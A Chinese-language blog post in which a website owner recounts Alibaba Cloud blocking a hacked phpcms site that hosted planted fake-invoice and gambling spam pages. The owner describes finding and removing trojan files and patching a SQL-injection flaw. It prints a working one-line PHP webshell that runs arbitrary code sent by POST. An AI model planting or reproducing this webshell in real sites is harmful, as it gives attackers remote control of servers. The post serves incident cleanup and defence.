都说阿里云的服务器特别的稳定，价格还实惠，多年续费还打8折，心动已久。

2017年初正式把网站迁移到阿里云服务器上，备好案，一切正常运行，网站访问速度比之前的西部数码真的是快了好多倍啊，不愧是马云家的东西。
 
3月15日上午，手机突然收到了阿里云的短信，提示我网站涉及违法不良信息被阿里云屏蔽访问处理。脑子顿时有点蒙圈，赶紧打开网站看一看，网站已经无法访问了，心情糟糕透了。

QQ邮箱也收到了阿里云的提示邮件，《违规URL屏蔽访问处理通知》，如下图所示：



尊敬的用户：

您的网站URL：http://www.hifi.com.cn/content-80-3006-1.html涉及违法不良信息，违反了相关服务协议和《互联网信息服务管理办法》第十五条规定，目前阿里云已对您的违法URL做屏蔽访问处理。

如果您对本通知的内容存有疑问，请及时工单或者电话联系我们， 谢谢您对阿里云的支持。
 
查看您网站涉及违禁商品类 -> 证件卡票

风险类型：违禁商品类-证件卡票

1、您需要将您的网站违法文件，违法页面进行彻底整改删除。（包括但不限于我们通知的内容）

2、需要您在公安备案平台 http://www.beian.gov.cn 申请公安备案，截图并工单反馈申请开通。

 
特别注意：

第一次（7天累计违规网页达100条） 阻断域名完全整改、公安平台提交网站备案、参加网站安全管理考试及培训。
 
第二次7天累计超过100条，我们会再次关停您的网站，并取消您的帐号参加阿里云平台全年营销活动的资格，阻断域名且1年内禁止参加阿里云平台营销活动。
 
第三次我们将永久关停您的网站不再提供解锁申请，并且您的帐号取消购买资格，后期将无法再在阿里云平台进行任何产品购买。
 
打开阿里云所说的链接地址：http://www.hifi.com.cn/content-80-3006-1.html

网站提示：该内容被禁止访问





看了阿里云的通知，我才意识到问题的严重性，在7天内不及时处理，网站就可能永久的被封了，停止访问了，我续了3年的服务器啊。大体了解了为什么阿里云会屏蔽

访问处理我的网站，从头到尾我把问题的解决过程记录到我的日志里，希望能帮到更多遇到同样情况的站长们。
 
第一步：首先看一下网站的百度的收录情况。



百度里site:网站，看到网站收录都是一些代开发票的信息，还有一些博彩类的恶意内容。

点击快照，竟然直接给跳转到别人的网站上去了，我这才意识到原来是我网站被黑了，网站的程序代码都被黑客篡改了，赶紧登陆服务器检查程序代码。

content-80-3006-1.html 这个文件也存在于网站跟目录下，打开一看确实都是一些代开发票，博彩的内容。又发现网站的根目录下多了一个php文件，名字也起的好特别。





里面竟然还有什么蜡笔小新，下面的代码都是加了密的，具体的内容没有看到，应该是黑客的木马文件，我随即删除了这个文件，又在其他文件夹下查到了一句话木马代码。

<?php var_dump(md5(123));$content=stripslashes($_POST[1]);eval($content);
 
这个木马的作用是POST提交，可以直接上传任意文件到网站目录下，并控制网站的权限。
 
在目录下还查到有一个TXT文件，里面竟然是代开发票的内容，终于找到问题的根本了。



把以上发现的木马文件都删除后，在阿里云工单里，提交了工单，抓紧让阿里云技术检查一下，还有没有了，大约1个小时内技术回复我的工单了，暂时已经解除网站屏蔽，网站现已正常访问了。
 
至此，关于阿里云阻断域名，屏蔽处理我网站的问题，彻底的得以解决，从头到尾又反思了一下整个问题的根本，为什么黑客会黑了我的网站，而且还上传了木马文件，这问题的本质应该是我的网站是有漏洞，

才会被黑客攻击。按照这个思路，网站用的是phpcms系统，百度搜索了下phpcms 漏洞，发现phpcms最近爆出了高危漏洞，SQL注入获取管理员密码的漏洞，原来是程序确实有漏洞了，看了大牛们文章修复方案，

本身我是搞程序设计的，自己根据修复方案，修复了网站的漏洞。
 
程序代码上的漏洞，需要有安全意识，懂程序代码的程序员才能修复的了，如果自己不懂程序代码，也可以找一些安全公司来解决，国内网站安全方面，也就Sinesafe和绿盟等等安全公司比较专业。